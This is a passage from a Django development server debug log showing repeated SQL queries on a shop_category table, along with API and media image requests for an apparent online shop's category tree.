"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:05:36,399 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:05:36,404 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) [13/Dec/2019 14:05:36] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-13 14:05:36,408 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:05:36,413 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:05:36,417 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:05:36,421 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:05:36,426 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:05:36,430 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:05:36,434 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:05:36,438 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:05:36,442 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:05:36,448 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:05:36,452 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:05:36,456 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:05:36,460 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:05:36,464 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:05:36,470 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:05:36,474 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:05:36,478 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:05:36,482 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:05:36,486 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:05:36,490 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:05:36,495 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:05:36,499 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:05:36,503 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:05:36,508 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:05:36,512 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:05:36] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:05:36] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:36] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:36] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:36] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:37] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:38] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:38] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:38] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:38] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:38] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:38] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:38] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:38] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:38] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:38] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 304 0 [13/Dec/2019 14:05:38] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 DEBUG 2019-12-13 14:05:47,325 utils 20136 140506652825344 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:05:47,333 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:05:47,338 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:05:47,340 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:05:47,346 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:05:47,348 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:05:47,355 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:05:47,357 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:05:47,360 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 14:05:47,360 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:05:47,367 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:05:47,369 utils 20136 140506652825344 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:05:47,372 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) [13/Dec/2019 14:05:47] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-13 14:05:47,375 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:05:47,378 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:05:47,381 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:05:47,386 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:05:47,389 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:05:47,392 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:05:47,395 utils 20136 140506652825344 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:05:47,398 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:05:47,402 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:05:47,405 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:05:47,407 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:05:47,409 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:05:47,411 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:05:47,413 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:05:47,417 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:05:47,419 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:05:47,421 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:05:47,423 utils 20136 140506652825344 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" 